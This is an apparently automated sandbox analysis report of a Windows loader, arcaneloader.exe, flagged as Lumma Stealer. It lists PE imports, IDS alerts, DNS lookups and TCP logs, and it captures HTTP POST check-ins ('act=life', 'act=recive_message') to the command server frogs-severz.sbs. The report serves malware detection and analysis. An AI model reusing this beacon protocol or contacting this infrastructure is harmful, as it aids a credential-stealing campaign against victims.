                                                                        .rsrc0x800000x1de80x1e00ff331c6468cd2ec8b30a579ec23d1204False0.9776041666666667data7.882227876387404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                        RT_ICON0x800ac0x1d26PNG image data, 256 x 256, 8-bit gray+alpha, non-interlaced0.9927633342267489
                                                                        RT_GROUP_ICON0x81dd40x14data1.05
                                                                        DLLImport
                                                                        KERNEL32.dllCloseHandle, CompareStringW, CreateFileA, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, FreeLibraryAndExitThread, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetExitCodeThread, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WaitForSingleObjectEx, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                        GDI32.dllCreateEllipticRgn
                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-23T15:03:05.016322+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649707172.67.155.47443TCP
                                                                        2024-11-23T15:03:05.706014+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649707172.67.155.47443TCP
                                                                        2024-11-23T15:03:05.706014+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649707172.67.155.47443TCP
                                                                        2024-11-23T15:03:07.004777+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649709172.67.155.47443TCP
                                                                        2024-11-23T15:03:07.718873+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649709172.67.155.47443TCP
                                                                        2024-11-23T15:03:07.718873+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649709172.67.155.47443TCP
                                                                        2024-11-23T15:03:09.287935+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649711172.67.155.47443TCP
                                                                        2024-11-23T15:03:11.509699+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649712172.67.155.47443TCP
                                                                        2024-11-23T15:03:13.653451+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649718172.67.155.47443TCP
                                                                        2024-11-23T15:03:16.264662+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649724172.67.155.47443TCP
                                                                        2024-11-23T15:03:16.992599+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649724172.67.155.47443TCP
                                                                        2024-11-23T15:03:18.795759+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649734172.67.155.47443TCP
                                                                        2024-11-23T15:03:22.293764+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649746172.67.155.47443TCP
                                                                        2024-11-23T15:03:23.048426+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649746172.67.155.47443TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 23, 2024 15:03:03.700448036 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:03.700495005 CET44349707172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:03.700572014 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:03.728261948 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:03.728290081 CET44349707172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:05.016222000 CET44349707172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:05.016321898 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.021338940 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.021353960 CET44349707172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:05.021750927 CET44349707172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:05.064135075 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.091238976 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.091264963 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.091547012 CET44349707172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:05.706048012 CET44349707172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:05.706193924 CET44349707172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:05.706258059 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.718024969 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.718060017 CET44349707172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:05.718076944 CET49707443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.718085051 CET44349707172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:05.790715933 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.790781975 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:05.790851116 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.791239977 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:05.791254997 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.004704952 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.004776955 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.006500006 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.006519079 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.006951094 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.008872032 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.008894920 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.008963108 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.718950033 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.719140053 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.719199896 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.719227076 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.719255924 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.719355106 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.719408989 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.719559908 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.719609976 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.719624996 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.731385946 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.731479883 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.731507063 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.782866955 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.782901049 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.829754114 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.841342926 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.892244101 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.910516024 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.914248943 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.914314032 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.914350986 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.914503098 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.914623976 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.914671898 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.914691925 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:07.914705992 CET49709443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:07.914712906 CET44349709172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:08.072496891 CET49711443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:08.072560072 CET44349711172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:08.072637081 CET49711443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:08.072973013 CET49711443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:08.072999954 CET44349711172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:09.287843943 CET44349711172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:09.287935019 CET49711443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:09.289724112 CET49711443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:09.289755106 CET44349711172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:09.290008068 CET44349711172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:09.291354895 CET49711443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:09.291555882 CET49711443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:09.291601896 CET44349711172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:10.082015038 CET44349711172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:10.082124949 CET44349711172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:10.082241058 CET49711443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:10.082261086 CET49711443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:10.242746115 CET49712443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:10.242801905 CET44349712172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:10.242880106 CET49712443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:10.243225098 CET49712443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:10.243241072 CET44349712172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:11.509596109 CET44349712172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:11.509699106 CET49712443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:11.511059999 CET49712443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:11.511079073 CET44349712172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:11.511310101 CET44349712172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:11.512609005 CET49712443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:11.512777090 CET49712443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:11.512809992 CET44349712172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:11.512862921 CET49712443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:11.555339098 CET44349712172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:12.163614988 CET44349712172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:12.163717031 CET44349712172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:12.163769007 CET49712443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:12.163856030 CET49712443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:12.440454960 CET49718443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:12.440490007 CET44349718172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:12.440733910 CET49718443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:12.441056967 CET49718443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:12.441066980 CET44349718172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:13.653271914 CET44349718172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:13.653450966 CET49718443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:13.654858112 CET49718443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:13.654867887 CET44349718172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:13.655128002 CET44349718172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:13.656806946 CET49718443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:13.656980991 CET49718443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:13.657005072 CET44349718172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:13.657085896 CET49718443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:13.657093048 CET44349718172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:14.586110115 CET44349718172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:14.586215019 CET44349718172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:14.586278915 CET49718443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:14.586472034 CET49718443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:14.586491108 CET44349718172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:14.954044104 CET49724443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:14.954101086 CET44349724172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:14.954158068 CET49724443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:14.954463005 CET49724443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:14.954482079 CET44349724172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:16.264547110 CET44349724172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:16.264662027 CET49724443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:16.266228914 CET49724443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:16.266236067 CET44349724172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:16.266478062 CET44349724172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:16.267924070 CET49724443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:16.267924070 CET49724443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:16.267976046 CET44349724172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:16.992599964 CET44349724172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:16.992701054 CET44349724172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:16.992815018 CET49724443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:16.993136883 CET49724443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:16.993156910 CET44349724172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:17.525717974 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:17.525758028 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:17.525862932 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:17.526176929 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:17.526191950 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.795692921 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.795758963 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.805001974 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.805023909 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.805241108 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.806476116 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.807223082 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.807255030 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.807378054 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.807410002 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.807555914 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.807590008 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.807701111 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.807739019 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.807856083 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.807885885 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.808015108 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.808044910 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.808053017 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.808065891 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.808307886 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.808336973 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.808356047 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.808614016 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.808654070 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.851334095 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.851475000 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.851530075 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.851552963 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.851571083 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:18.851593971 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:18.851608992 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:21.000606060 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:21.000703096 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:21.000747919 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:21.000863075 CET49734443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:21.000869036 CET44349734172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:21.028065920 CET49746443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:21.028105021 CET44349746172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:21.028163910 CET49746443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:21.028443098 CET49746443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:21.028460026 CET44349746172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:22.293687105 CET44349746172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:22.293764114 CET49746443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:22.294917107 CET49746443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:22.294935942 CET44349746172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:22.295175076 CET44349746172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:22.296322107 CET49746443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:22.296379089 CET49746443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:22.296401978 CET44349746172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:23.048441887 CET44349746172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:23.048541069 CET44349746172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:23.048609018 CET49746443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:23.048980951 CET49746443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:23.049006939 CET44349746172.67.155.47192.168.2.6
                                                                        Nov 23, 2024 15:03:23.049021006 CET49746443192.168.2.6172.67.155.47
                                                                        Nov 23, 2024 15:03:23.049030066 CET44349746172.67.155.47192.168.2.6
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 23, 2024 15:03:03.097207069 CET5911053192.168.2.61.1.1.1
                                                                        Nov 23, 2024 15:03:03.335712910 CET53591101.1.1.1192.168.2.6
                                                                        Nov 23, 2024 15:03:03.456376076 CET6521053192.168.2.61.1.1.1
                                                                        Nov 23, 2024 15:03:03.694583893 CET53652101.1.1.1192.168.2.6
                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 23, 2024 15:03:03.097207069 CET192.168.2.61.1.1.10x963dStandard query (0)fumblingactor.cyouA (IP address)IN (0x0001)false
                                                                        Nov 23, 2024 15:03:03.456376076 CET192.168.2.61.1.1.10x8e2eStandard query (0)frogs-severz.sbsA (IP address)IN (0x0001)false
                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 23, 2024 15:03:03.335712910 CET1.1.1.1192.168.2.60x963dName error (3)fumblingactor.cyounonenoneA (IP address)IN (0x0001)false
                                                                        Nov 23, 2024 15:03:03.694583893 CET1.1.1.1192.168.2.60x8e2eNo error (0)frogs-severz.sbs172.67.155.47A (IP address)IN (0x0001)false
                                                                        Nov 23, 2024 15:03:03.694583893 CET1.1.1.1192.168.2.60x8e2eNo error (0)frogs-severz.sbs104.21.88.250A (IP address)IN (0x0001)false
                                                                        • frogs-severz.sbs
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.649707172.67.155.47443280C:\Users\user\Desktop\arcaneloader.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 14:03:05 UTC263OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 14:03:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-11-23 14:03:05 UTC1009INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 14:03:05 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=0dml8tub1gvbm3ln9jr3qs4mtt; expires=Wed, 19-Mar-2025 07:49:44 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pFLAmbw8cCMZ5TQQp7Xj3OoOOYmsHM8SuWUIAQ2Ave8%2BOlF49%2BZLT5XfAVr1Zt0V9k0eWiCi8w6XXE9e8wrN%2BeeGfASgY3P5napVjG7bzsa7lwgiai9sqjQsVHgI5%2BZzy12w"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e71b35e1c264406-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2173&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1330296&cwnd=186&unsent_bytes=0&cid=8fbf55f91f052788&ts=713&x=0"
                                                                        2024-11-23 14:03:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                        Data Ascii: 2ok
                                                                        2024-11-23 14:03:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.649709172.67.155.47443280C:\Users\user\Desktop\arcaneloader.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-11-23 14:03:07 UTC264OUTPOST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 54
                                                                        Host: frogs-severz.sbs
                                                                        2024-11-23 14:03:07 UTC54OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 70 79 6f 6b 6f 6e 65 77 78 64 78 78 26 6a 3d
                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--pyokonewxdxx&j=
                                                                        2024-11-23 14:03:07 UTC1013INHTTP/1.1 200 OK
                                                                        Date: Sat, 23 Nov 2024 14:03:07 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=mh28sibpif8ja0k96j41gl40ou; expires=Wed, 19-Mar-2025 07:49:46 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        cf-cache-status: DYNAMIC
                                                                        vary: accept-encoding
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=faZwr69dfwfKjZH%2FYjHlTSPg%2FiQNiN34Io571I6bnZ%2FGcqGN6xbDk5D0BKYore3yGTiAowQlsc5I%2F754060Qc5ek5Y%2BZQNIPMoITqn4CGb0DqbKYGhMWU%2Fy0SYTnBcYhHb71"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8e71b36a7f390f69-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1475&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=954&delivery_rate=1927392&cwnd=250&unsent_bytes=0&cid=44b225ca96b109ff&ts=721&x=0"
                                                                        2024-11-23 14:03:07 UTC356INData Raw: 34 64 61 0d 0a 76 56 77 37 50 7a 74 37 59 71 7a 73 36 79 6d 4e 34 39 57 72 54 36 2b 57 77 49 41 70 39 59 74 4a 76 68 34 38 45 37 32 33 69 6a 6e 47 66 6b 30 64 41 55 39 4f 6a 70 2b 4f 43 37 65 58 70 39 34 71 67 37 53 68 35 41 76 50 37 53 6a 53 62 56 6b 2f 6e 38 48 6e 47 34 63 36 57 6c 4e 49 48 6b 36 4f 69 5a 4d 4c 74 37 69 75 69 53 72 42 74 50 71 69 54 4a 2f 70 4b 4e 4a 38 58 58 6a 53 78 2b 5a 61 31 54 42 63 56 31 34 59 42 73 32 41 68 6b 7a 6f 68 72 54 42 49 63 62 37 71 4f 30 4c 32 61 6b 73 78 44 77 47 4d 66 44 53 2f 6c 6a 77 50 55 68 55 47 51 5a 4f 31 38 36 4f 52 36 2f 5a 39 38 6f 71 7a 66 71 6d 35 45 4b 64 34 79 48 61 66 56 68 35 7a 64 37 73 55 64 55 2b 58 31 5a 55 45 52 4c 41 69 6f 46 48 37 6f 79 30 69 57 4f 4e 38 37 71 69 45 39 65 36 47 64 39 74 54 32
